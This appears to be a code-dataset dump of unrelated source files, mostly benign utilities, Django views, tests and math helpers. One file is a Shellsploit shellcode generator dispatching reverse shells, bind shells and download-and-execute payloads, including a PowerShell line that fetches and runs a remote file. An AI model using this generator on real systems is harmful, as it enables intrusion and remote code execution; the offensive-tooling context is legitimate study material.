""" 生成随机的字符串, 默认长度12个字符 """
return ''.join(random.choice(allowed_chars) for i in range(length))
def get_random_secret_key():
""" 生成一个50个字符组成的随机字符串作为SECRET_KEY的setting值 """
chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
return get_random_string(50, chars)
def get_phone_verify_code(length=4):
""" 生成手机短信验证码 """
chars = '0123456789'
return get_random_string(length, chars)
def get_email_verify_code(length=4):
""" 生成邮箱验证码 """
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' \
+ '0123456789'
return get_random_string(length, chars)
def get_session_id(length=48):
""" 生成session id字符串 """
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' \
+ '0123456789-_'
return get_random_string(length, chars)
def get_invite_code(length=6):
""" 生成邀请码 """
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
return get_random_string(length, chars)
def md5(data):
""" md5算法加密字符串 """
""" type(data): str """
m = hashlib.md5()
m.update(data.encode('utf-8'))
return m.hexdigest()
def b64(data):
""" base64 encode """
""" type(data): str """
base64_encrypt = base64.b64encode(data.encode('utf-8'))
return str(base64_encrypt, 'utf-8')
def b64decode(data):
""" base64 decode """
base64_decrypt = base64.b64decode(data.encode('utf-8'))
return str(base64_decrypt, 'utf-8')
def base64_md5(data):
""" 进行MD5加密,然后Base64编码 """
""" type(data): str """
return b64(md5(data))
| 24.246753 | 76 | 0.658811 | 196 | 1,867 | 6.096939 | 0.372449 | 0.05272 | 0.075314 | 0.087866 | 0.396653 | 0.379916 | 0.293724 | 0.2159 | 0.2159 | 0.175732 | 0 | 0.078788 | 0.204606 | 1,867 | 76 | 77 | 24.565789 | 0.725926 | 0.123728 | 0 | 0.157895 | 0 | 0 | 0.206137 | 0.168112 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0 | 0.131579 | 0 | 0.657895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
d1680b983b55af635dd1b1c4efc3a00f490e8be1 | 10,276 | py | Python | core/database/generator.py | xorond/l0l | bb0c2bb23fc49997b695cf27d2b2b25169395521 | [
"WTFPL"
] | 6 | 2018-10-29T19:46:49.000Z | 2022-03-10T15:39:47.000Z | core/database/generator.py | xorond/l0l | bb0c2bb23fc49997b695cf27d2b2b25169395521 | [
"WTFPL"
] | null | null | null | core/database/generator.py | xorond/l0l | bb0c2bb23fc49997b695cf27d2b2b25169395521 | [
"WTFPL"
] | 4 | 2018-10-16T13:28:27.000Z | 2022-02-05T18:43:57.000Z | #------------------Bombermans Team---------------------------------#
#Author : B3mB4m
#Concat : b3mb4m@protonmail.com
#Project : https://github.com/b3mb4m/Shellsploit
#LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE
#------------------------------------------------------------------#
def generator( choose, shellcode, argv="None", argv2="None"):
if choose == "linux_x86":
if shellcode == "bin_sh":
from Linux86.bin_shx86 import bin_shx86
return bin_shx86()
elif shellcode == "exec":
from Linux86.execc import execc
return execc( argv)
elif shellcode == "read":
from Linux86.readfilex86 import readx86
from stackconvert import stackconvertSTR
return readx86( stackconvertSTR(argv))
elif shellcode == "download&exec":
from Linux86.download import downloadANDexecute
from stackconvert import stackconvertSTR
filename = argv.split("/")[-1]
return downloadANDexecute( stackconvertSTR(argv), stackconvertSTR(filename))
elif shellcode == "chmod":
from Linux86.chmod import ch
from stackconvert import stackconvertSTR
return ch( stackconvertSTR(argv))
elif shellcode == "tcp_bind":
from Linux86.tcp_bindx86 import tcp_bindx86
from stackconvert import PORT
return tcp_bindx86( PORT(argv))
elif shellcode == "reverse_tcp":
from Linux86.reverse_tcpx86 import reverse_tcpx86
from stackconvert import IP
from stackconvert import PORT
return reverse_tcpx86( IP(argv), PORT(argv2))
elif shellcode == "cd_eject":
from Linux86.cd_eject import cd_eject
return cd_eject()
elif choose == "linux_x64":
if shellcode == "bin_sh":
from Linux64.bin_shx64 import bin_shx64
return bin_shx64()
elif shellcode == "tcp_bind":
from Linux64.tcp_bindx64 import tcp_bindx64
from stackconvert import PORT
return tcp_bindx64( PORT(argv))
elif shellcode == "reverse_tcp":
from Linux64.reverse_tcpx64 import reverse_tcpx64
from stackconvert import IP
from stackconvert import PORT
return reverse_tcpx64( IP(argv), PORT(argv2))
elif shellcode == "read":
from Linux64.readfilex64 import readx64
from stackconvert import plaintext
return readx64( plaintext(argv))
elif choose == "linux":
from Linux.magic import merlin
if shellcode == "bin_sh":
from Linux86.bin_shx86 import bin_shx86
from Linux64.bin_shx64 import bin_shx64
value = hex(len(bin_shx86().split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+bin_shx86()+bin_shx64()
elif shellcode == "read":
from Linux86.readfilex86 import readx86
from Linux64.readfilex64 import readx64
from stackconvert import stackconvertSTR
from stackconvert import plaintext
value = hex(len(readx86( stackconvertSTR(argv)).split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+readx86( stackconvertSTR(argv))+readx64( plaintext(argv))
elif shellcode == "reverse_tcp":
from Linux64.reverse_tcpx64 import reverse_tcpx64
from Linux86.reverse_tcpx86 import reverse_tcpx86
from stackconvert import IP
from stackconvert import PORT
value = hex(len(reverse_tcpx86( IP(argv), PORT(argv2)).split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+reverse_tcpx86( IP(argv), PORT(argv2))+reverse_tcpx64( IP(argv), PORT(argv2))
elif shellcode == "tcp_bind":
from Linux64.tcp_bindx64 import tcp_bindx64
from Linux86.tcp_bindx86 import tcp_bindx86
from stackconvert import PORT
value = hex(len(tcp_bindx86( PORT(argv)).split("\\x"))-1)[2:]
value = "\\x{0}".format(value)
return merlin( value)+tcp_bindx86( PORT(argv))+tcp_bindx64( PORT(argv))
elif choose == "osx86":
if shellcode == "tcp_bind":
from OSX86.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
elif shellcode == "bin_sh":
from OSX86.bin_sh import bin_sh
return bin_sh()
elif shellcode == "reverse_tcp":
from OSX86.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif choose == "osx64":
if shellcode == "bin_sh":
from OSX64.bin_sh import bin_sh
return bin_sh()
elif shellcode == "reverse_tcp":
from OSX64.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif shellcode == "tcp_bind":
from OSX64.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
elif choose == "freebsd_x86":
if shellcode == "bin_sh":
from FreeBSDx86.bin_sh import bin_sh
return bin_sh()
elif shellcode == "read":
from FreeBSDx86.read import read
from stackconvert import plaintext
return read(plaintext(argv))
elif shellcode == "reverse_tcp":
from FreeBSDx86.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv2), PORT(argv))
elif shellcode == "reverse_tcp2":
from FreeBSDx86.reverse_tcp2 import reverse_tcp2
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp2( IP(argv2), PORT(argv))
elif shellcode == "tcp_bind":
from FreeBSDx86.tcp_bind import tcp_bind
if len(str(argv)) == 5:
PORT = "\\x{0}\\x{1}".format(*(hex(int(argv))[2:][0:2],hex(int(argv))[2:][2:]))
else:
PORT = "\\x{0}\\x{1}".format(*("0"+hex(int(argv))[2:][0],hex(int(argv))[2:][1:]))
return tcp_bind( PORT)
elif shellcode == "exec":
from FreeBSDx86.execc import execc
from stackconvert import plaintext
command = '/bin/sh -c {0}'.format(argv)
return execc(plaintext(argv))
elif choose == "freebsd_x64":
if shellcode == "bin_sh":
from FreeBSDx64.bin_sh import bin_sh
return bin_sh()
elif shellcode == "exec":
from FreeBSDx64.execc import execc
from stackconvert import plaintext
command = '/bin/sh -c {0}'.format(argv)
return execc(plaintext(argv))
elif shellcode == "tcp_bind":
from stackconvert import plaintext
from stackconvert import PORT
from FreeBSDx64.tcp_bind import tcp_bind
return tcp_bind( PORT(argv), plaintext(argv2))
elif shellcode == "reverse_tcp":
from FreeBSDx64.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif choose == "linux_arm":
if shellcode == "chmod":
from LinuxARM.chmod import chmod
from stackconvert import plaintext
if argv == "None":
return "FILE PATH must be declared."
else:
return chmod( plaintext(argv))
elif shellcode == "bin_sh":
from LinuxARM.bin_sh import bin_sh
return bin_sh()
elif shellcode == "exec":
from LinuxARM.execc import execc
return execc( argv)
elif shellcode == "reverse_tcp":
from LinuxARM.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv2), PORT(argv))
elif choose == "linux_mips":
if shellcode == "reverse_tcp":
from LinuxMIPS.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
return reverse_tcp( IP(argv), PORT(argv2))
elif shellcode == "bin_sh":
from LinuxMIPS.bin_sh import bin_sh
return bin_sh()
elif shellcode == "chmod":
from LinuxMIPS.chmod import chmod
from stackconvert import plaintext
return chmod( plaintext(argv))
elif shellcode == "tcp_bind":
from LinuxMIPS.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
elif choose == "windows":
if shellcode == "messagebox":
from Windows import messagebox
from stackconvert import stackconvertSTR
if argv == "None":
return messagebox.messagebox( False)
else:
return messagebox.messagebox( stackconvertSTR(argv, True))
elif shellcode == "downloadandexecute":
from Windows.downloadandexecute import downANDexecute
from stackconvert import rawSTR
from stackconvert import stackconvertSTR
if argv2 == "None":
argv2 = argv.split("/")[-1]
powershell = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s') ;(New-Object -com Shell.Application).ShellExecute('%s');}"''' % (argv, argv2, argv2)
return downANDexecute(payload=stackconvertSTR(powershell))
elif shellcode == "exec":
from Windows.execc import WinExec
return WinExec(argv)
elif shellcode == "tcp_bind":
from Windows.bind_tcp import PayloadModule
return PayloadModule( argv).gen_shellcode()
elif shellcode == "reverse_tcp":
from Windows.rev_tcp import PayloadModule
return PayloadModule( argv, argv2).gen_shellcode()
elif choose == "solarisx86":
if shellcode == "read":
from Solarisx86.read import read
from stackconvert import plaintext
return read( plaintext(argv))
elif shellcode == "reverse_tcp":
from Solarisx86.reverse_tcp import reverse_tcp
from stackconvert import IP
from stackconvert import PORT
#return reverse_tcp(host=IP(argv), port=PORT(argv2))
dombili = IP(argv)
kocakari = PORT(argv2)
return reverse_tcp(host=dombili, port=kocakari)
elif shellcode == "bin_sh":
from Solarisx86.bin_sh import bin_sh
return bin_sh()
elif shellcode == "tcp_bind":
from Solarisx86.tcp_bind import tcp_bind
from stackconvert import PORT
return tcp_bind( PORT(argv))
| 34.139535 | 201 | 0.647042 | 1,211 | 10,276 | 5.367465 | 0.09744 | 0.113231 | 0.155692 | 0.076 | 0.683231 | 0.605692 | 0.528 | 0.484462 | 0.448769 | 0.427538 | 0 | 0.033868 | 0.247178 | 10,276 | 300 | 202 | 34.253333 | 0.80636 | 0.033476 | 0 | 0.580508 | 0 | 0.004237 | 0.074675 | 0.007357 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.423729 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
d16a18b5e5a64b815eb735cb177e88912486769f | 1,020 | py | Python | bomber/views.py | acdh-oeaw/DAAC-DB | e1332db708bb6f5bfe5f202e6ae7e04bf4b593b3 | [
"MIT"
] | null | null | null | bomber/views.py | acdh-oeaw/DAAC-DB | e1332db708bb6f5bfe5f202e6ae7e04bf4b593b3 | [
"MIT"
] | null | null | null | bomber/views.py | acdh-oeaw/DAAC-DB | e1332db708bb6f5bfe5f202e6ae7e04bf4b593b3 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django_tables2 import RequestConfig
from django.views.generic.detail import DetailView
from django.db.models import Count
from crew.models import Person
from .models import Bomber
from .tables import BomberTable
def bomber(request):
table = BomberTable(Bomber.objects.all())
RequestConfig(request).configure(table)
object_list = Bomber.objects.all()
return render(request, 'bomber/list_bomber.html', {'table': table, 'object_list': object_list})
class BomberDetailView(DetailView):
model = Bomber
def get_context_data(self, **kwargs):
context = super(BomberDetailView, self).get_context_data(**kwargs)
current_object = self.object
context['destiny'] = Person.objects.filter(bomber=current_object.id).values('destiny_checked').annotate(total=Count('destiny_checked')).order_by('destiny_checked')
context['crew_list'] = Person.objects.filter(bomber=current_object.id).order_by('destiny_checked')
return context
| 37.777778 | 171 | 0.755882 | 126 | 1,020 | 5.968254 | 0.380952 | 0.053191 | 0.042553 | 0.066489 | 0.106383 | 0.106383 | 0.106383 | 0 | 0 | 0 | 0 | 0.001133 | 0.134314 | 1,020 | 26 | 172 | 39.230769 | 0.85051 | 0 | 0 | 0 | 0 | 0 | 0.112745 | 0.022549 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.35 | 0 | 0.65 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
66f44f9766c4d040eac6704c6c2ae8556c45fffa | 342 | py | Python | Monitoring/dht22_monitor.py | jpradass/Raspberry-Utils | b14c25e7dc9bedbea62d19240db3fb202372ea2c | [
"MIT"
] | null | null | null | Monitoring/dht22_monitor.py | jpradass/Raspberry-Utils | b14c25e7dc9bedbea62d19240db3fb202372ea2c | [
"MIT"
] | null | null | null | Monitoring/dht22_monitor.py | jpradass/Raspberry-Utils | b14c25e7dc9bedbea62d19240db3fb202372ea2c | [
"MIT"
] | null | null | null | import time
import requests
INFLUX_URL = 'http://localhost:8086/write?db=DHT22'
def sendDataToGrafana(humidity, temp, pressure):
requests.post(INFLUX_URL, data='temperature value=' + str(temp))
requests.post(INFLUX_URL, data='humidity value=' + str(humidity))
requests.post(INFLUX_URL, data='pressure value=' + str(pressure))
| 28.5 | 69 | 0.736842 | 44 | 342 | 5.636364 | 0.477273 | 0.145161 | 0.217742 | 0.254032 | 0.302419 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0.122807 | 342 | 11 | 70 | 31.090909 | 0.806667 | 0 | 0 | 0 | 0 | 0 | 0.246334 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
66ff808193f491101625deb10d4b03096229d8fa | 204 | py | Python | tests/deeply/test_exception.py | achillesrasquinha/deeply | fd1ce32da130591fc92df8df89e07f1497b2b902 | [
"MIT"
] | 2 | 2021-10-05T16:37:30.000Z | 2021-10-11T21:31:43.000Z | tests/deeply/test_exception.py | achillesrasquinha/deeply | fd1ce32da130591fc92df8df89e07f1497b2b902 | [
"MIT"
] | null | null | null | tests/deeply/test_exception.py | achillesrasquinha/deeply | fd1ce32da130591fc92df8df89e07f1497b2b902 | [
"MIT"
] | 1 | 2021-07-16T02:23:37.000Z | 2021-07-16T02:23:37.000Z | # imports - module imports
from deeply.exception import (
DeeplyError
)
# imports - test imports
import pytest
def test_deeply_error():
with pytest.raises(DeeplyError):
raise DeeplyError | 18.545455 | 36 | 0.730392 | 23 | 204 | 6.391304 | 0.608696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.20098 | 204 | 11 | 37 | 18.545455 | 0.90184 | 0.230392 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | true | 0 | 0.285714 | 0 | 0.428571 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
66ffbb10c3681dba5f743ff2d041228d5ccdc263 | 1,153 | py | Python | test/common.py | philippe-goetz/python-jwt | 8dff3e43023f344642af55ad82f3cfb28b00f8d5 | [
"MIT"
] | null | null | null | test/common.py | philippe-goetz/python-jwt | 8dff3e43023f344642af55ad82f3cfb28b00f8d5 | [
"MIT"
] | null | null | null | test/common.py | philippe-goetz/python-jwt | 8dff3e43023f344642af55ad82f3cfb28b00f8d5 | [
"MIT"
] | null | null | null | """ Common setup and patching for tests """
#pylint: disable=wrong-import-order
from datetime import datetime as orig_datetime, timedelta
from mock import patch
import threading
#pylint: disable=W0401,W0614
from test.fixtures import *
_thread_state = threading.local()
def _new_utcnow():
""" Return last set datetime, or set it to current datetime if not set """
if not hasattr(_thread_state, 'utcnow'):
_thread_state.utcnow = orig_datetime.utcnow()
return _thread_state.utcnow
def _new_now():
""" Work out current local datetime """
return _new_utcnow() + (orig_datetime.now() - orig_datetime.utcnow())
def clock_load(utcnow):
""" Set datetime """
_thread_state.utcnow = utcnow
return _thread_state.utcnow
def clock_tick(delta=timedelta()):
""" Tick clock """
return clock_load(_new_utcnow() + delta)
def clock_reset():
""" Forget set datetime """
if hasattr(_thread_state, 'utcnow'):
delattr(_thread_state, 'utcnow')
_config = {'utcnow.side_effect': _new_utcnow,
'now.side_effect': _new_now}
_patcher = patch('datetime.datetime', **_config)
_mocker = _patcher.start()
| 28.825 | 78 | 0.70425 | 147 | 1,153 | 5.231293 | 0.37415 | 0.114434 | 0.154746 | 0.062419 | 0.083225 | 0.083225 | 0 | 0 | 0 | 0 | 0 | 0.008412 | 0.175195 | 1,153 | 39 | 79 | 29.564103 | 0.80021 | 0.213356 | 0 | 0.086957 | 0 | 0 | 0.078251 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.173913 | 0 | 0.565217 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0f03c437607dd785e33ff9e71aa3dbb48d46d5a4 | 1,314 | py | Python | utils/prediction.py | ZhengLiangliang1996/Speech-Recogniton-Tool-Box | 0a2353d990e3f0a3057a747ff52fd3a066d4289d | [
"MIT"
] | null | null | null | utils/prediction.py | ZhengLiangliang1996/Speech-Recogniton-Tool-Box | 0a2353d990e3f0a3057a747ff52fd3a066d4289d | [
"MIT"
] | null | null | null | utils/prediction.py | ZhengLiangliang1996/Speech-Recogniton-Tool-Box | 0a2353d990e3f0a3057a747ff52fd3a066d4289d | [
"MIT"
] | null | null | null | #! /usr/bin/env python
"""
Author: LiangLiang ZHENG
Date:
File Description
"""
import sys
import time
import os
sys.path.append('..')
from __future__ import print_function
import sys
import argparse
from keras import backend as K
from utils.cha_level_helper import output_sequence
import numpy as np
#TODO: still need to be tested
def get_predictions_then_print(data, label, mode, model, model_path):
""" Print a model's decoded predictions
Params:
index (int): dataset index
mode: which will get the dataset
model: model will be used
model_path (str): model checkpoint
"""
data_len = len(data)
for i in range(data_len):
# Obtain and decode the acoustic model's predictions
model.load_weights(model_path)
prediction = model.predict(data[i])
output_length = [model.output_length(data[i].shape[1])]
#why + 1?
pred_ints = (K.eval(K.ctc_decode(
prediction, output_length)[0][0])).flatten().tolist()
# Play the audio file, and display the true and predicted transcriptions
print('-'*80)
print('Ground Truth:\n' + '\n' + output_sequence(label[i]))
print('-'*80)
print('Predicted seq:\n' + '\n' + ''.join(output_sequence(pred_ints)))
print('-'*80)
| 28.565217 | 80 | 0.649924 | 179 | 1,314 | 4.631285 | 0.536313 | 0.050663 | 0.036188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00995 | 0.23516 | 1,314 | 45 | 81 | 29.2 | 0.814925 | 0.311263 | 0 | 0.217391 | 0 | 0 | 0.046404 | 0 | 0 | 0 | 0 | 0.022222 | 0 | 1 | 0.043478 | false | 0 | 0.391304 | 0 | 0.434783 | 0.304348 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
0f0a874b832d5307c77060e388ac90f502854fe7 | 852 | py | Python | notes/algo-ds-practice/problems/number_theory/multiplicative_mod_inverse/multiplicative_mod_inverse.py | Anmol-Singh-Jaggi/interview-notes | 65af75e2b5725894fa5e13bb5cd9ecf152a0d652 | [
"MIT"
] | 6 | 2020-07-05T05:15:19.000Z | 2021-01-24T20:17:14.000Z | notes/algo-ds-practice/problems/number_theory/multiplicative_mod_inverse/multiplicative_mod_inverse.py | Anmol-Singh-Jaggi/interview-notes | 65af75e2b5725894fa5e13bb5cd9ecf152a0d652 | [
"MIT"
] | null | null | null | notes/algo-ds-practice/problems/number_theory/multiplicative_mod_inverse/multiplicative_mod_inverse.py | Anmol-Singh-Jaggi/interview-notes | 65af75e2b5725894fa5e13bb5cd9ecf152a0d652 | [
"MIT"
] | 2 | 2020-09-14T06:46:37.000Z | 2021-06-15T09:17:21.000Z | from algo.number_theory.extended_gcd.extended_gcd import extended_gcd
from algo.number_theory.eulers_totient_function.eulers_totient import etf
def mod_inverse_gcd(a, m):
'''
a and m should be coprime!
Complexity -> O(log(m)).
'''
return extended_gcd(a, m)[0]
def mod_inverse_eulers(a, m):
'''
a and m should be coprime.
Complexity -> O(sqrt(m) + log(m)).
'''
etf_m = etf(m)
return pow(a, etf_m - 1, m)
def mod_inverse_fermat(a, p):
'''
p must be prime and a should not be a multiple of p.
Is a special case of Euler's Totient function actually.
Complexity -> O(log(p)).
'''
return pow(a, p - 2, p)
def main():
a = 7
m = 5
print(mod_inverse_gcd(7, 5))
print(mod_inverse_fermat(7, 5))
print(mod_inverse_eulers(7, 5))
if __name__ == "__main__":
main()
| 20.780488 | 73 | 0.627934 | 140 | 852 | 3.6 | 0.342857 | 0.119048 | 0.077381 | 0.095238 | 0.198413 | 0.130952 | 0.130952 | 0.130952 | 0.130952 | 0.130952 | 0 | 0.017054 | 0.242958 | 852 | 40 | 74 | 21.3 | 0.764341 | 0.289906 | 0 | 0 | 0 | 0 | 0.014733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.235294 | false | 0 | 0.117647 | 0 | 0.529412 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0f116262d51df870092baaa77da7c1a3942b13fa | 121 | py | Python | BOJ/week02/recursion/ex10872.py | FridayAlgorithm/taesong_study | 50c07ee6ead0fb5bb80e0decb03b801cbbbabf9c | [
"MIT"
] | null | null | null | BOJ/week02/recursion/ex10872.py | FridayAlgorithm/taesong_study | 50c07ee6ead0fb5bb80e0decb03b801cbbbabf9c | [
"MIT"
] | null | null | null | BOJ/week02/recursion/ex10872.py | FridayAlgorithm/taesong_study | 50c07ee6ead0fb5bb80e0decb03b801cbbbabf9c | [
"MIT"
] | 2 | 2020-12-27T15:03:46.000Z | 2021-03-06T14:13:34.000Z | N = int(input())
def factorial(N):
if N == 0:
return 1
return N * factorial(N-1)
print(factorial(N))
| 11 | 29 | 0.545455 | 19 | 121 | 3.473684 | 0.526316 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035294 | 0.297521 | 121 | 10 | 30 | 12.1 | 0.741176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.5 | 0.166667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0f1b976e46c7f2ba93a9ecff9c247ef02d3200d7 | 774 | py | Python | benchmark/python/tpch_base.py | alefranz/spark | f5f15379b2c080339a36423b0262f29d978fd362 | [
"MIT"
] | 1 | 2019-06-14T09:25:43.000Z | 2019-06-14T09:25:43.000Z | benchmark/python/tpch_base.py | tianyaba/spark | f1c5b86d84bc91cb2d6f5aaf3d2a401de6fd4098 | [
"MIT"
] | null | null | null | benchmark/python/tpch_base.py | tianyaba/spark | f1c5b86d84bc91cb2d6f5aaf3d2a401de6fd4098 | [
"MIT"
] | null | null | null | # Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
import pyspark
from pyspark.sql import SparkSession
class TpchBase:
def __init__(self, spark, dir):
self.customer = spark.read.parquet(dir + "customer")
self.lineitem = spark.read.parquet(dir + "lineitem")
self.nation = spark.read.parquet(dir + "nation")
self.region = spark.read.parquet(dir + "region")
self.orders = spark.read.parquet(dir + "orders")
self.part = spark.read.parquet(dir + "part")
self.partsupp = spark.read.parquet(dir + "partsupp")
self.supplier = spark.read.parquet(dir + "supplier")
| 43 | 70 | 0.683463 | 103 | 774 | 5.097087 | 0.427184 | 0.137143 | 0.24381 | 0.289524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204134 | 774 | 17 | 71 | 45.529412 | 0.852273 | 0.249354 | 0 | 0 | 0 | 0 | 0.093588 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0f1d77811b98689b2cae0d686170946ae5f678f0 | 621 | py | Python | server/schemas/kind_to_strain.py | Georgi2704/pricelist-fastapi-boilerplate | 24b88e1f5c28b7eaff50745cd4464caac6de01e6 | [
"Apache-2.0"
] | null | null | null | server/schemas/kind_to_strain.py | Georgi2704/pricelist-fastapi-boilerplate | 24b88e1f5c28b7eaff50745cd4464caac6de01e6 | [
"Apache-2.0"
] | 2 | 2021-11-11T15:19:30.000Z | 2022-02-07T22:52:07.000Z | server/schemas/kind_to_strain.py | Georgi2704/pricelist-fastapi | 24b88e1f5c28b7eaff50745cd4464caac6de01e6 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from typing import Optional
from uuid import UUID
from server.schemas.base import BoilerplateBaseModel
class KindToStrainBase(BoilerplateBaseModel):
kind_id: UUID
strain_id: UUID
# Properties to receive via API on creation
class KindToStrainCreate(KindToStrainBase):
pass
# Properties to receive via API on update
class KindToStrainUpdate(KindToStrainBase):
pass
class KindToStrainInDBBase(KindToStrainBase):
id: UUID
class Config:
orm_mode = True
# Additional properties to return via API
class KindToStrainSchema(KindToStrainInDBBase):
pass
| 18.818182 | 52 | 0.780998 | 69 | 621 | 6.985507 | 0.492754 | 0.037344 | 0.078838 | 0.091286 | 0.112033 | 0.112033 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178744 | 621 | 32 | 53 | 19.40625 | 0.945098 | 0.194847 | 0 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.176471 | 0.235294 | 0 | 0.764706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
0f2faddde2571ad100ca7bd92dfedb14e2aab42d | 375 | py | Python | examples/bbox.py | mzaglia/stac.py | 39314add494b5ab1bf11c44dcb69eba4614144db | [
"MIT"
] | null | null | null | examples/bbox.py | mzaglia/stac.py | 39314add494b5ab1bf11c44dcb69eba4614144db | [
"MIT"
] | null | null | null | examples/bbox.py | mzaglia/stac.py | 39314add494b5ab1bf11c44dcb69eba4614144db | [
"MIT"
